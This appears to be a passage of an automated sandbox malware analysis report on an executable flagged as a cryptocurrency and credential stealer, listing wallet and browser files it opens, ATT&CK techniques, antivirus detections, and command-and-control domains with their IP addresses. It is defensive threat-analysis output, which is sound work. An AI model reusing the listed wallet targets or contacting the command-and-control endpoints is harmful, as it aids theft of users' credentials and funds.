              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2264629296.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2287190996.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2229105379.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2228954482.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2230325310.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2230936460.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2229792744.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2279546614.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2229045443.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2261809944.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: b0ho5YYSdo.exe PID: 7412, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: b0ho5YYSdo.exe PID: 7412, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              Process Injection
              45
              Virtualization/Sandbox Evasion
              1
              OS Credential Dumping
              851
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              1
              Process Injection
              LSASS Memory45
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol31
              Data from Local System
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information
              Security Account Manager2
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials223
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              b0ho5YYSdo.exe51%VirustotalBrowse
              b0ho5YYSdo.exe55%ReversingLabsWin32.Trojan.Symmi
              b0ho5YYSdo.exe100%AviraTR/Crypt.XPACK.Gen
              b0ho5YYSdo.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://screwamusresz.buzz:443/api100%Avira URL Cloudmalware
              https://scentniej.buzz/apij0%Avira URL Cloudsafe
              https://screwamusresz.buzz:443/apis0%Avira URL Cloudsafe
              https://screwamusresz.buzz:443/apingwithouttoggle:4303560%Avira URL Cloudsafe
              https://rebuildeso.buzz/api100%Avira URL Cloudmalware
              https://screwamusresz.buzz:443/api-40%Avira URL Cloudsafe
              https://prisonyfork.buzz/api100%Avira URL Cloudmalware
              https://scentniej.buzz/api100%Avira URL Cloudmalware
              https://inherineau.buzz/0%Avira URL Cloudsafe
              https://screwamusresz.buzz/N0%Avira URL Cloudsafe
              https://screwamusresz.buzz/??0%Avira URL Cloudsafe
              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.0%Avira URL Cloudsafe
              https://scentniej.buzz/0%Avira URL Cloudsafe
              https://screwamusresz.buzz/apig0%Avira URL Cloudsafe
              https://screwamusresz.buzz:443/apionlineselextraction:3308720%Avira URL Cloudsafe
              https://screwamusresz.buzz:443/api.default-release/key4.dbPK0%Avira URL Cloudsafe
              https://screwamusresz.buzz/apim0%Avira URL Cloudsafe
              https://inherineau.buzz/api100%Avira URL Cloudmalware
              https://screwamusresz.buzz/api100%Avira URL Cloudmalware
              https://screwamusresz.buzz/apisKLe0%Avira URL Cloudsafe
              https://screwamusresz.buzz/.0%Avira URL Cloudsafe
              https://inherineau.buzz/zX0%Avira URL Cloudsafe
              https://screwamusresz.buzz/0%Avira URL Cloudsafe
              https://screwamusresz.buzz/apiD0%Avira URL Cloudsafe

              Download Network PCAP: filteredfull

              NameIPActiveMaliciousAntivirus DetectionReputation
              scentniej.buzz
              104.21.63.217
              truetrue
                unknown
                inherineau.buzz
                172.67.206.214
                truetrue
                  unknown
                  prisonyfork.buzz
                  104.21.74.40
                  truetrue
                    unknown
                    s-part-0035.t-0009.t-msedge.net
                    13.107.246.63
                    truefalse
                      high
                      rebuildeso.buzz
                      172.67.143.157
                      truetrue
                        unknown
                        mindhandru.buzz
                        104.21.11.101
                        truefalse
                          high
                          screwamusresz.buzz
                          104.21.66.113
                          truetrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://rebuildeso.buzz/apitrue
                            • Avira URL Cloud: malware
                            unknown
                            scentniej.buzzfalse
                              high
                              https://scentniej.buzz/apitrue
                              • Avira URL Cloud: malware
                              unknown
                              hummskitnj.buzzfalse
                                high
                                mindhandru.buzzfalse
                                  high
                                  https://prisonyfork.buzz/apitrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://mindhandru.buzz/apifalse
                                    high
                                    https://screwamusresz.buzz/apitrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    rebuildeso.buzzfalse
                                      high
                                      appliacnesot.buzzfalse
                                        high
                                        screwamusresz.buzzfalse
                                          high
                                          cashfuzysao.buzzfalse
                                            high
                                            inherineau.buzzfalse
                                              high
                                              prisonyfork.buzzfalse
                                                high
                                                https://inherineau.buzz/apitrue
                                                • Avira URL Cloud: malware
                                                unknown
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabb0ho5YYSdo.exe, 00000000.00000003.2230247900.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230451591.00000000054E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://screwamusresz.buzz:443/apingwithouttoggle:430356b0ho5YYSdo.exe, 00000000.00000003.2279517554.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2287988665.00000000054CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://duckduckgo.com/ac/?q=b0ho5YYSdo.exe, 00000000.00000003.2230247900.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230451591.00000000054E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://inherineau.buzz/b0ho5YYSdo.exe, 00000000.00000003.1965484060.00000000006E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://screwamusresz.buzz:443/apib0ho5YYSdo.exe, b0ho5YYSdo.exe, 00000000.00000003.2109044489.00000000006D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://screwamusresz.buzz/Nb0ho5YYSdo.exe, 00000000.00000003.2279517554.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2261752329.00000000054CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://scentniej.buzz/apijb0ho5YYSdo.exe, 00000000.00000003.2229792744.00000000006C6000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2228757080.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2109044489.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230936460.00000000006C6000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2228954482.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.1965484060.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230325310.00000000006C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=b0ho5YYSdo.exe, 00000000.00000003.2230247900.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230451591.00000000054E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5b0ho5YYSdo.exe, 00000000.00000003.2279658506.00000000054FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://screwamusresz.buzz:443/api-4b0ho5YYSdo.exe, 00000000.00000003.2312595522.00000000054C9000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2339796853.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2347127317.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2279517554.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2261752329.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2287988665.00000000054CB000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2326428175.00000000054CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://screwamusresz.buzz:443/apisb0ho5YYSdo.exe, 00000000.00000003.2312595522.00000000054C9000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2339796853.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2347127317.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2326428175.00000000054CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://x1.c.lencr.org/0b0ho5YYSdo.exe, 00000000.00000003.2262417268.0000000005520000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://x1.i.lencr.org/0b0ho5YYSdo.exe, 00000000.00000003.2262417268.0000000005520000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchb0ho5YYSdo.exe, 00000000.00000003.2230247900.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230451591.00000000054E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://screwamusresz.buzz/nb0ho5YYSdo.exe, 00000000.00000003.2279517554.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2261752329.00000000054CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&ctab0ho5YYSdo.exe, 00000000.00000003.2279658506.00000000054FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.mozilla.org/products/firefoxgro.allb0ho5YYSdo.exe, 00000000.00000003.2264798550.00000000057D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://screwamusresz.buzz:443/apionlineselextraction:330872b0ho5YYSdo.exe, 00000000.00000003.2339796853.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2347127317.00000000054CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icob0ho5YYSdo.exe, 00000000.00000003.2230247900.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230451591.00000000054E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://screwamusresz.buzz:443/api.default-release/key4.dbPKb0ho5YYSdo.exe, 00000000.00000003.2339796853.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2347127317.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2326428175.00000000054CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=b0ho5YYSdo.exe, 00000000.00000003.2230247900.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230451591.00000000054E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0b0ho5YYSdo.exe, 00000000.00000003.2262417268.0000000005520000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://scentniej.buzz/b0ho5YYSdo.exe, 00000000.00000003.1965484060.00000000006E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://ocsp.rootca1.amazontrust.com0:b0ho5YYSdo.exe, 00000000.00000003.2262417268.0000000005520000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://screwamusresz.buzz/apimb0ho5YYSdo.exe, 00000000.00000003.2339796853.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2347127317.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2326428175.00000000054CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.ecosia.org/newtab/b0ho5YYSdo.exe, 00000000.00000003.2230247900.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230451591.00000000054E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://screwamusresz.buzz/apigb0ho5YYSdo.exe, 00000000.00000003.2339796853.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2347127317.00000000054CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brb0ho5YYSdo.exe, 00000000.00000003.2264798550.00000000057D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://screwamusresz.buzz/??b0ho5YYSdo.exe, 00000000.00000003.2229105379.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2228954482.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2229045443.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2228628808.000000000070B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.b0ho5YYSdo.exe, 00000000.00000003.2279658506.00000000054FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://ac.ecosia.org/autocomplete?q=b0ho5YYSdo.exe, 00000000.00000003.2230247900.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230451591.00000000054E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgb0ho5YYSdo.exe, 00000000.00000003.2279658506.00000000054FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://screwamusresz.buzz/apisKLeb0ho5YYSdo.exe, 00000000.00000003.2264629296.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2287190996.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2340795803.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2279546614.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2339878402.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2261809944.00000000006D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?b0ho5YYSdo.exe, 00000000.00000003.2262417268.0000000005520000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&ub0ho5YYSdo.exe, 00000000.00000003.2279658506.00000000054FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://screwamusresz.buzz/.b0ho5YYSdo.exe, 00000000.00000003.2339796853.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2347127317.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2279517554.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2326428175.00000000054CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://inherineau.buzz/zXb0ho5YYSdo.exe, 00000000.00000003.1965484060.00000000006E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgb0ho5YYSdo.exe, 00000000.00000003.2279658506.00000000054FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYib0ho5YYSdo.exe, 00000000.00000003.2279658506.00000000054FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=b0ho5YYSdo.exe, 00000000.00000003.2230247900.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230451591.00000000054E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://screwamusresz.buzz/b0ho5YYSdo.exe, b0ho5YYSdo.exe, 00000000.00000003.2326502056.0000000000729000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2264629296.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2312595522.00000000054C9000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2339796853.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2347127317.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2287190996.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2341027601.000000000072A000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2228826946.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2279517554.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2326355109.0000000000725000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2340795803.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2109044489.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2261752329.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2229105379.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2279546614.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2228654050.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2228954482.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2229045443.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2339878402.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2326428175.00000000054CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://screwamusresz.buzz/apiDb0ho5YYSdo.exe, 00000000.00000003.2312595522.00000000054C9000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2339796853.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2347127317.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2279517554.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2261752329.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2287988665.00000000054CB000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2326428175.00000000054CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs
                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              104.21.74.40
                                                                                              prisonyfork.buzzUnited States
                                                                                              13335CLOUDFLARENETUStrue
                                                                                              104.21.63.217
                                                                                              scentniej.buzzUnited States
                                                                                              13335CLOUDFLARENETUStrue
                                                                                              172.67.143.157
                                                                                              rebuildeso.buzzUnited States
                                                                                              13335CLOUDFLARENETUStrue
                                                                                              172.67.206.214
                                                                                              inherineau.buzzUnited States
                                                                                              13335CLOUDFLARENETUStrue
                                                                                              104.21.11.101
                                                                                              mindhandru.buzzUnited States
                                                                                              13335CLOUDFLARENETUSfalse
                                                                                              104.21.66.113
                                                                                              screwamusresz.buzzUnited States
                                                                                              13335CLOUDFLARENETUStrue
                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                              Analysis ID:1580881
                                                                                              Start date and time:2024-12-26 12:48:25 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 6m 16s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:6
